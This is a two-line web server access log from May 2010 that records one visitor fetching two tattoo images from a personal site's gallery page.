84.249.100.246 - - [08/May/2010:14:33:19 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
84.249.100.246 - - [08/May/2010:14:33:19 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1 (.NET CLR 3.5.30729)"
